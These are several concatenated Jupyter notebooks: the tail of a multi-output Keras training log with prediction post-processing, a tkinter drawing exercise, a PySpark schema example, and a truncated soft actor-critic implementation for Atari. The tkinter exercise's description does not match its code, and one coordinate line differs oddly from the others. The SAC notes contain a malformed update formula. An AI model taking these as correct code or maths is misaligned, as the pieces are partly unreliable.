val_output_c_loss: 0.5340 Epoch 20/70 120/120 - 7s - loss: 4.7543 - output_react_loss: 0.5258 - output_bg_ph_loss: 0.5629 - output_ph_loss: 0.7631 - output_mg_c_loss: 0.5556 - output_c_loss: 0.7027 - val_loss: 4.4704 - val_output_react_loss: 0.5217 - val_output_bg_ph_loss: 0.6260 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5295 - val_output_c_loss: 0.5194 Epoch 21/70 120/120 - 7s - loss: 4.6307 - output_react_loss: 0.5109 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7462 - output_mg_c_loss: 0.5416 - output_c_loss: 0.6850 - val_loss: 4.4541 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6222 - val_output_ph_loss: 0.5931 - val_output_mg_c_loss: 0.5274 - val_output_c_loss: 0.5190 Epoch 22/70 120/120 - 7s - loss: 4.7757 - output_react_loss: 0.5252 - output_bg_ph_loss: 0.5555 - output_ph_loss: 0.7932 - output_mg_c_loss: 0.5553 - output_c_loss: 0.7104 - val_loss: 4.4514 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6220 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5191 Epoch 23/70 120/120 - 8s - loss: 4.6922 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5512 - output_ph_loss: 0.7699 - output_mg_c_loss: 0.5475 - output_c_loss: 0.7008 - val_loss: 4.4529 - val_output_react_loss: 0.5212 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5273 - val_output_c_loss: 0.5190 Epoch 24/70 120/120 - 7s - loss: 4.7715 - output_react_loss: 0.5251 - output_bg_ph_loss: 0.5536 - output_ph_loss: 0.7821 - output_mg_c_loss: 0.5579 - output_c_loss: 0.7160 - val_loss: 4.4516 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6236 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5187 Epoch 25/70 120/120 - 7s - loss: 4.4517 - output_react_loss: 0.4876 - output_bg_ph_loss: 0.5274 - output_ph_loss: 0.7290 - output_mg_c_loss: 0.5185 - output_c_loss: 0.6555 - val_loss: 4.4539 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5915 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5184 Epoch 26/70 120/120 - 7s - loss: 4.6458 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5382 - output_ph_loss: 0.7634 - output_mg_c_loss: 0.5398 - output_c_loss: 0.7015 - val_loss: 4.4547 - val_output_react_loss: 0.5210 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5278 - val_output_c_loss: 0.5182 Epoch 27/70 120/120 - 7s - loss: 4.5106 - output_react_loss: 0.4968 - output_bg_ph_loss: 0.5324 - output_ph_loss: 0.7305 - output_mg_c_loss: 0.5255 - output_c_loss: 0.6708 - val_loss: 4.4500 - val_output_react_loss: 0.5203 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5281 - val_output_c_loss: 0.5190 Epoch 28/70 120/120 - 7s - loss: 4.6403 - output_react_loss: 0.5107 - output_bg_ph_loss: 0.5368 - output_ph_loss: 0.7640 - output_mg_c_loss: 0.5427 - output_c_loss: 0.6960 - val_loss: 4.4483 - val_output_react_loss: 0.5201 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5918 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5192 Epoch 29/70 120/120 - 7s - loss: 4.4913 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5276 - output_ph_loss: 0.7353 - output_mg_c_loss: 0.5262 - output_c_loss: 0.6706 - val_loss: 4.4535 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6213 - val_output_ph_loss: 0.5946 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5192 Epoch 30/70 120/120 - 7s - loss: 4.5325 - output_react_loss: 0.4932 - output_bg_ph_loss: 0.5301 - output_ph_loss: 0.7476 - output_mg_c_loss: 0.5284 - output_c_loss: 0.6813 - val_loss: 4.4534 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5190 Epoch 31/70 120/120 - 7s - loss: 4.6655 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5454 - output_ph_loss: 0.7764 - output_mg_c_loss: 0.5364 - output_c_loss: 0.6935 - val_loss: 4.4497 - val_output_react_loss: 0.5211 - val_output_bg_ph_loss: 0.6212 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5267 - val_output_c_loss: 0.5194 Epoch 32/70 120/120 - 7s - loss: 4.5931 - output_react_loss: 0.4959 - output_bg_ph_loss: 0.5323 - output_ph_loss: 0.7595 - output_mg_c_loss: 0.5395 - output_c_loss: 0.6981 - val_loss: 4.4446 - val_output_react_loss: 0.5206 - val_output_bg_ph_loss: 0.6205 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5169 Epoch 33/70 120/120 - 7s - loss: 4.3964 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5141 - output_ph_loss: 0.7203 - output_mg_c_loss: 0.5127 - output_c_loss: 0.6580 - val_loss: 4.4553 - val_output_react_loss: 0.5209 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5288 - val_output_c_loss: 0.5187 Epoch 34/70 120/120 - 7s - loss: 4.4073 - output_react_loss: 0.4855 - output_bg_ph_loss: 0.5156 - output_ph_loss: 0.7207 - output_mg_c_loss: 0.5123 - output_c_loss: 0.6599 - val_loss: 4.4478 - val_output_react_loss: 0.5195 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5909 - val_output_mg_c_loss: 0.5271 - val_output_c_loss: 0.5185 Epoch 35/70 120/120 - 7s - loss: 4.5178 - output_react_loss: 0.4913 - output_bg_ph_loss: 0.5249 - output_ph_loss: 0.7517 - output_mg_c_loss: 0.5276 - output_c_loss: 0.6785 - val_loss: 4.4527 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5185 Epoch 36/70 120/120 - 7s - loss: 4.4502 - output_react_loss: 0.4907 - output_bg_ph_loss: 0.5147 - output_ph_loss: 0.7224 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6778 - val_loss: 4.4616 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6234 - val_output_ph_loss: 0.5936 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5192 Epoch 37/70 120/120 - 7s - loss: 4.5019 - output_react_loss: 0.4848 - output_bg_ph_loss: 0.5232 - output_ph_loss: 0.7487 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6834 - val_loss: 4.4388 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5906 - val_output_mg_c_loss: 0.5255 - val_output_c_loss: 0.5183 Epoch 38/70 120/120 - 7s - loss: 4.6008 - output_react_loss: 0.4989 - output_bg_ph_loss: 0.5318 - output_ph_loss: 0.7743 - output_mg_c_loss: 0.5331 - output_c_loss: 0.6988 - val_loss: 4.4428 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6201 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5173 Epoch 39/70 120/120 - 7s - loss: 4.4832 - output_react_loss: 0.4915 - output_bg_ph_loss: 0.5185 - output_ph_loss: 0.7407 - output_mg_c_loss: 0.5242 - output_c_loss: 0.6742 - val_loss: 4.4557 - val_output_react_loss: 0.5196 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5195 Epoch 40/70 120/120 - 7s - loss: 4.3365 - output_react_loss: 0.4731 - output_bg_ph_loss: 0.5059 - output_ph_loss: 0.7114 - output_mg_c_loss: 0.5005 - output_c_loss: 0.6661 - val_loss: 4.4675 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6240 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5309 - val_output_c_loss: 0.5204 Epoch 41/70 120/120 - 7s - loss: 4.4591 - output_react_loss: 0.4814 - output_bg_ph_loss: 0.5189 - output_ph_loss: 0.7371 - output_mg_c_loss: 0.5184 - output_c_loss: 0.6846 - val_loss: 4.4509 - val_output_react_loss: 0.5202 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5189 Epoch 42/70 Epoch 00042: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 4.4446 - output_react_loss: 0.4837 - output_bg_ph_loss: 0.5138 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5199 - output_c_loss: 0.6659 - val_loss: 4.4508 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5283 - val_output_c_loss: 0.5190 Epoch 43/70 120/120 - 7s - loss: 4.3063 - output_react_loss: 0.4751 - output_bg_ph_loss: 0.4987 - output_ph_loss: 0.7046 - output_mg_c_loss: 0.4995 - output_c_loss: 0.6551 - val_loss: 4.4425 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5911 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5182 Epoch 44/70 120/120 - 7s - loss: 4.4064 - output_react_loss: 0.4764 - output_bg_ph_loss: 0.5094 - output_ph_loss: 0.7278 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6679 - val_loss: 4.4411 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5908 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5180 Epoch 45/70 120/120 - 7s - loss: 4.4373 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5169 - output_ph_loss: 0.7386 - output_mg_c_loss: 0.5150 - output_c_loss: 0.6702 - val_loss: 4.4420 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6208 - val_output_ph_loss: 0.5907 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5180 Epoch 46/70 120/120 - 7s - loss: 4.4963 - output_react_loss: 0.4870 - output_bg_ph_loss: 0.5140 - output_ph_loss: 0.7410 - output_mg_c_loss: 0.5299 - output_c_loss: 0.6936 - val_loss: 4.4415 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5178 Epoch 47/70 Restoring model weights from the end of the best epoch. Epoch 00047: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 8s - loss: 4.4492 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5137 - output_ph_loss: 0.7492 - output_mg_c_loss: 0.5126 - output_c_loss: 0.6827 - val_loss: 4.4389 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5904 - val_output_mg_c_loss: 0.5258 - val_output_c_loss: 0.5177 Epoch 00047: early stopping ###Markdown Model loss graph ###Code for fold, history in enumerate(history_list): print(f'\nFOLD: {fold+1}') min_valid_idx = np.array(history['val_loss']).argmin() print(f"Train {np.array(history['loss'])[min_valid_idx]:.5f} Validation {np.array(history['val_loss'])[min_valid_idx]:.5f}") plot_metrics_agg(history_list) ###Output FOLD: 1 Train 4.08940 Validation 4.55253 FOLD: 2 Train 3.78819 Validation 4.34760 FOLD: 3 Train 4.06594 Validation 4.46747 FOLD: 4 Train 4.15711 Validation 4.50378 FOLD: 5 Train 4.50192 Validation 4.43876 ###Markdown Post-processing ###Code # Assign preds to OOF set for idx, col in enumerate(pred_cols): val = oof_preds[:, :, idx] oof = oof.assign(**{f'{col}_pred': list(val)}) oof.to_csv('oof.csv', index=False) oof_preds_dict = {} for col in pred_cols: oof_preds_dict[col] = oof_preds[:, :, idx] # Assign values to test set preds_ls = [] for df, preds in [(public_test, test_public_preds), (private_test, test_private_preds)]: for i, uid in enumerate(df.id): single_pred = preds[i] single_df = pd.DataFrame(single_pred, columns=pred_cols) single_df['id_seqpos'] = [f'{uid}_{x}' for x in range(single_df.shape[0])] preds_ls.append(single_df) preds_df = pd.concat(preds_ls) ###Output _____no_output_____ ###Markdown Model evaluation ###Code y_true_dict = get_targets_dict(train, pred_cols, train.index) y_true = np.array([y_true_dict[col] for col in pred_cols]).transpose((1, 2, 0, 3)).reshape(oof_preds.shape) display(evaluate_model(train, y_true, oof_preds, pred_cols)) display(evaluate_model(train, y_true, oof_preds, pred_cols, use_cols=['reactivity', 'deg_Mg_pH10', 'deg_Mg_50C'])) ###Output _____no_output_____ ###Markdown Visualize test predictions ###Code submission = pd.read_csv(database_base_path + 'sample_submission.csv') submission = submission[['id_seqpos']].merge(preds_df, on=['id_seqpos']) ###Output _____no_output_____ ###Markdown Test set predictions ###Code display(submission.head(10)) display(submission.describe()) submission.to_csv('submission.csv', index=False) ###Output _____no_output_____
Python3/Anaconda-Jupyter/Python181103-059.ipynb
###Markdown 题目:画图,综合例子。  程序分析:利用for循环控制100-999个数,每个数分解出个位,十位,百位。。程序源代码: ###Code #!/usr/bin/python # -*- coding: UTF-8 -*- if __name__ == '__main__': from tkinter import * canvas = Canvas(width = 300,height = 300,bg = 'green') canvas.pack(expand = YES,fill = BOTH) x0 = 150 y0 = 100 canvas.create_oval(x0 - 10,y0 - 10,x0 + 10,y0 + 10) canvas.create_oval(x0 - 20,y0 - 20,x0 + 20,y0 + 20) canvas.create_oval(x0 - 50,y0 - 50,x0 + 50,y0 + 50) import math B = 0.809 for i in range(16): a = 2 * math.pi / 16 * i x = math.ceil(x0 + 48 * math.cos(a)) y = math.ceil(y0 + 48 * math.sin(a) * B) canvas.create_line(x0,y0,x,y,fill = 'red') canvas.create_oval(x0 - 60,y0 - 60,x0 + 60,y0 + 60) for k in range(501): for i in range(17): a = (2 * math.pi / 16) * i + (2 * math.pi / 180) * k x = math.ceil(x0 + 48 * math.cos(a)) y = math.ceil(y0 + 48 + math.sin(a) * B) canvas.create_line(x0,y0,x,y,fill = 'red') for j in range(51): a = (2 * math.pi / 16) * i + (2* math.pi / 180) * k - 1 x = math.ceil(x0 + 48 * math.cos(a)) y = math.ceil(y0 + 48 * math.sin(a) * B) canvas.create_line(x0,y0,x,y,fill = 'red') mainloop() ###Output _____no_output_____
Spark_DataSets/PySpark_DataSets/01_spark_basics_schema.ipynb
###Markdown Criando Schema ###Code schema = StructType([StructField("name", StringType(), True), StructField("grade", IntegerType(), True)]) df = spark.read.json("datasets/student.json", schema=schema) df.printSchema() df.describe().show() ###Output +-------+-----+-----------------+ |summary| name| grade| +-------+-----+-----------------+ | count| 3| 3| | mean| null|6.666666666666667| | stddev| null|2.516611478423583| | min| Jonh| 4| | max|Peter| 9| +-------+-----+-----------------+
algorithm_implement/soft_actor_critic/soft_actor_critic(SAC)_discrete_image.ipynb
###Markdown Algorithm Soft Actor-CriticFROM PAPER*****Input:** $\theta_1, \theta_2, \phi .$&nbsp;&nbsp;&nbsp;&nbsp;$\bar{\theta}_1\leftarrow \theta_1 ,\bar{\theta}_2\leftarrow \theta_2$&nbsp;&nbsp;&nbsp;&nbsp;$D \leftarrow \varnothing$&nbsp;&nbsp;&nbsp;&nbsp;**for** each iteration **do**&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**for** each environment step **do**&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$a_t \sim \pi_\phi(a_t|s_t)$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$s_{t+1}\sim p(s_{t+1}|s_t, a_t)$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$D \leftarrow D\cup\{(s_t,a_t,r(s_t,a_t),s_{t+1})\}$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**end for**&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**for** each gradient step **do**&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\theta_i\leftarrow\theta_i - \lambda_Q\hat{\nabla}_{\theta_i}J_Q(\theta_i) $&nbsp;&nbsp;for $i\in \{1,2\}$ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Update the Q-function parameters&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\phi \leftarrow \phi - \lambda_\pi\hat{\nabla}_\phi J_\pi(\phi)$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Update policy weights&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\psi\leftarrow \lambda_V\hat{\nabla}_\psi J_V(\psi)$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adjust temperature&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$\bar{\theta}_i\leftarrow \tau\theta_i+(1-\tau)\bar{\theta}_i $&nbsp; for$i\in \{1,2\}$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Update target network weights&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;**end for**&nbsp;&nbsp;&nbsp;&nbsp;**end for****Output:**&nbsp;$\theta_1,\theta_2,\phi$ Main Formula:1. Soft Bellman residual:$$J_Q(\theta)=\mathbb{E}_{(s_t,a_t)\sim D}\big[\frac{1}{2}(Q_\theta(s_t,a_t)-{\cal{T}}^\pi Q(s_t,a_t))^2\big]\tag{1}$$Soft Q-value function:$${\cal{T}}^\pi Q(s_t,a_t) \triangleq r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim p}[V_\bar{\theta}(s_{t+1})]\tag{2}$$Soft state value function:$$V(s_t) = \mathbb{E}_{a_t\sim \pi}[Q(s_t,a_t)-\alpha\log\pi(a_t|s_t)]\tag{3}$$由此推出Soft Bellman residual导数:$$\hat{\nabla}_\theta J_Q(\theta)=\nabla_\theta Q_\theta(a_t,s_t)(Q_\theta(s_t,a_t)-(r(s_t,a_t)+\gamma(Q_{\bar{\theta}}(s_{t+1},a_{t+1})-\alpha\log(\pi_\phi(a_{t+1}|s_{t+1}))))\tag{4}$$2. Policy Loss:$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D}\big[\mathbb{E}_{a_t\sim \pi_\phi}[Q_\phi(s_t,a_t)-\alpha\log(\pi_\phi(a_t|s_t))]\big]\tag{5}$$又$$a_t=f_\phi(\epsilon_t;s_t),\tag{6}$$所以可写成:$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D,\;\epsilon_t\sim N}[Q_\theta(s_t,f_\phi(\epsilon_t;s_t))-\alpha\log\pi_\phi(f_\phi(\epsilon_t;s_t)|s_t)]\tag{7}$$所以其导数形式为:$$\hat{\nabla}_\phi J_\pi(\phi)=\nabla_\phi\alpha\log(\pi_\phi(a_t|s_t))+\big(\nabla_{a_t}\alpha\log(\pi_\phi(a_t|s_t))-\nabla_{a_t}Q(s_t,a_t)\big)\nabla_\phi f_\phi(\epsilon_t;s_t),\tag{8}$$3. 自适应temperature $\alpha$(论文中说$\alpha$和$Q$、$\pi$是对偶问题,有点不明白):$$\alpha^*_t=\arg {\min_{\alpha_t}}\mathbb{E}_{a_t\sim\pi^*_t}[-\alpha_t\log\pi^*_t(a_t|s_t;a_t)-\alpha_t\bar{H}]\tag{9}$$ Formula Proofs1. Proof formula $f_2(f_3)$:从最开始的动作转移开始,对于在每次$state$采取的$action$所获得的$soft\ reward$都可定义如下:$$r_{soft}(s_t,a_t)=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim \rho}H(\pi(\cdot|s_{t+1}))\tag{10}$$将其带入到原始的$Q\ function\ : Q(s_t,a_t)=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q(s_{t+1},a_{t+1})]$中得:$$\begin{aligned}Q_{soft}(s_t,a_t)&=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q_{soft}(s_{t+1},a_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\mathbb{E}_{s_{t+1}\sim\rho}\mathbb{E}_{a_{t+1}\sim\pi}[-\alpha\log\pi(a_{t+1}|s_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho}[\mathbb{E}_{a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})-\alpha\log(\pi(a_{t+1}|s_{t+1}))]]\end{aligned}\tag{11}$$2. Proff formula $f$ [相对熵(KL散度)](https://blog.csdn.net/tsyccnh/article/details/79163834)对于同一个随机变量x单独的概率分布P(x)和Q(x),用来衡量其分布的差异$$D_{KL}(p||q)=\sum_{i=1}^n p(x_i)\log[\frac{p(x_i)}{q(x_i)}]$$$D_{KL}$越接近于0,$p,q$分布越接近展开得$$\begin{aligned}D_{KL}(p||q)&=\sum_{i=1}^np(x_i)\log(p(x_i))-\sum^n_{i+1}p(x_i)\log(q(x_i)) \\&=\underbrace{-H(p(x))}_{熵}+\underbrace{[-\sum^n_{i=1}p(x_i)\log(q(x_i))]}_{交叉熵}\end{aligned}$$在分类问题中,假设label为p,则前部分是不变的,即只需计算后部分,即**交叉熵** Landscape讲了那么多高深的理论,其实就是在actor和critic计算loss的时候分别考虑了entorpy,增加探索。也就是说critic既然是知道actor前进的,那么你也必须将增加探索这四个字铭记在心,不然你怎么知道actor的动作呢其次,deterministic版本的sac是没有entorpy的,因为是确定性策略所以没有entropy的来源(所以确定性策略的sac其实比TD3效果可能还要差)要有entorpy必须是normal distribution,所以其实要改成离散的动作空间,也就几行代码的事 代码实现的Tips1. 使用torch.no_grad(), 而不是.detach()更加直观 相较于SAC的五大EDIT1. 将Critic network 改为input state, output Q_value2. 将Actor network 改为softmax输出3. 将Critic更新计算Q改为根据Actor进行gather4. alpha更新通过Actor进行gather5. Actor更新乘上了每个动作的概率,以此来达到方差最小化 ---Atari环境对学习率非常敏感,1e-3和1e-4差别非常大---加上nn.BatchNorm2d(32)并不能加快学习 ###Code import torch import torch.nn as nn import torch.optim as optim from torch.distributions import Categorical import torch.nn.functional as F from torch.utils.tensorboard import SummaryWriter import gym import random import numpy as np from itertools import count import matplotlib.pyplot as plt from collections import namedtuple, deque import time import os import sys sys.path.append('../') from utils.wrappers import make_atari, wrap_deepmind, wrap_pytorch %matplotlib inline device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') class ReplayBuffer: def __init__(self, state_dims, buffer_size, batch_size): self.state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32) self.action = np.zeros(buffer_size, dtype=np.float32) self.next_state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32) self.reward = np.zeros(buffer_size, dtype=np.float32) self.done = np.zeros(buffer_size, dtype=np.float32) self.batch_size = batch_size self.buffer_size = buffer_size self.size, self.current_index = 0, 0 def store(self, state, action, next_state, reward, done): self.state[self.current_index] = state self.action[self.current_index] = action self.next_state[self.current_index] = next_state self.reward[self.current_index] = reward self.done[self.current_index] = done self.current_index = (self.current_index + 1) % self.buffer_size self.size = min((self.size + 1), self.buffer_size) def sample(self): idx = np.random.choice(self.size, self.batch_size) return dict(state = torch.FloatTensor(self.state[idx]).to(device), action = torch.LongTensor(self.action[idx]).unsqueeze(1).to(device), next_state = torch.FloatTensor(self.next_state[idx]).to(device), reward = torch.FloatTensor(self.reward[idx]).unsqueeze(1).to(device), done = torch.FloatTensor(self.done[idx]).unsqueeze(1).to(device)) def __len__(self): return self.size def weights_init_(m): if isinstance(m, nn.Linear): # 使用 std = $$\text{std} = \text{gain} \times \sqrt{\frac{2}{\text{fan\_in} + \text{fan\_out}}}$$ # 来代替高斯分布(0, std ^ 2)的std torch.nn.init.xavier_uniform_(m.weight, gain=1) if m.bias is not None: torch.nn.init.constant_(m.bias, 0) # self.common_layer = nn.Sequential( # nn.Conv2d(state_dims[0], 32, kernel_size=5, stride=1, padding=2), # nn.MaxPool2d(2), # nn.ReLU(), # nn.Conv2d(32, 32, kernel_size=5, stride=1, padding=1), # nn.MaxPool2d(2), # nn.ReLU(), # nn.Conv2d(32, 64, kernel_size=4, stride=1, padding=1), # nn.MaxPool2d(2), # nn.ReLU(), # nn.Conv2d(64, 64, kernel_size=3, stride=1), # nn.MaxPool2d(2), # nn.ReLU() # ) # EDIT 1 class Critic(nn.Module): def __init__(self, state_dims, action_dim, hidden_dim=512): super(Critic, self).__init__() self.common_layer = nn.Sequential( nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4), nn.BatchNorm2d(32), nn.ReLU(), nn.Conv2d(32, 64, kernel_size=4, stride=2), nn.BatchNorm2d(64), nn.ReLU(), nn.Conv2d(64, 64, kernel_size=3, stride=1), nn.BatchNorm2d(64), nn.ReLU() ) self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim) self.linear2 = nn.Linear(hidden_dim, action_dim) self.apply(weights_init_) def forward(self, state): common = self.common_layer(state) common = common.view(common.size(0), -1) linear = F.relu(self.linear1(common)) value = self.linear2(linear) return value # EDIT 2 class Actor(nn.Module): def __init__(self, state_dims, action_dim, hidden_dim=512): super(Actor, self).__init__() self.common_layer = nn.Sequential( nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4),\ nn.BatchNorm2d(32), nn.ReLU(), nn.Conv2d(32, 64, kernel_size=4, stride=2), nn.BatchNorm2d(64), nn.ReLU(), nn.Conv2d(64, 64, kernel_size=3, stride=1), nn.BatchNorm2d(64), nn.ReLU() ) self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim) self.linear2 = nn.Linear(hidden_dim, action_dim) self.apply(weights_init_) def forward(self, state): common = self.common_layer(state) common = common.view(common.size(0), -1) linear = F.relu(self.linear1(common)) action_probs = F.softmax(self.linear2(linear), dim=1) max_action_prob = torch.argmax(action_probs, dim=1) dist = Categorical(action_probs) action = dist.sample() action_log_prob = dist.logits return action.unsqueeze(1), action_probs, action_log_prob def take_action(state, timesteps): if start_steps > timesteps: action = env.action_space.sample() else: state = torch.FloatTensor(state).unsqueeze(0).to(device) with torch.no_grad(): action, _, _ = actor(state) action = action.item() return action ## hyperparameters env_name = "PongNoFrameskip-v4" start_steps = 10000 # env_name = "Breakout-v0" # start_steps = 500 env = make_atari(env_name) env = wrap_deepmind(env) env = wrap_pytorch(env) algorithm_id = "soft_actor_critic_discrete_image" buffer_size = int(1e6) batch_size = 64 episodes = 10000 learning_rate = 1e-5 gamma = 0.99 soft_tau = 5e-3 actor_update = 2 automatic_entropy_tuning = True ## hyperparameters current_time = time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(time.time())) ROOT_DIR = "../running_log/{}/{}/{}".format(algorithm_id, env_name, current_time) model_dir = os.path.join(ROOT_DIR, "model") plot_dir = os.path.join(ROOT_DIR, "tensorboard") os.makedirs(model_dir) os.makedirs(plot_dir) writer = SummaryWriter(plot_dir, comment="learning_rate={}-batch_size={}-start_steps={}" .format(learning_rate , batch_size, start_steps)) # env = gym.make(env_name) # state_dim = env.observation_space.shape[0] state_dims = env.observation_space.shape action_dim = env.action_space.n critic_1 = Critic(state_dims, action_dim).to(device) critic_2 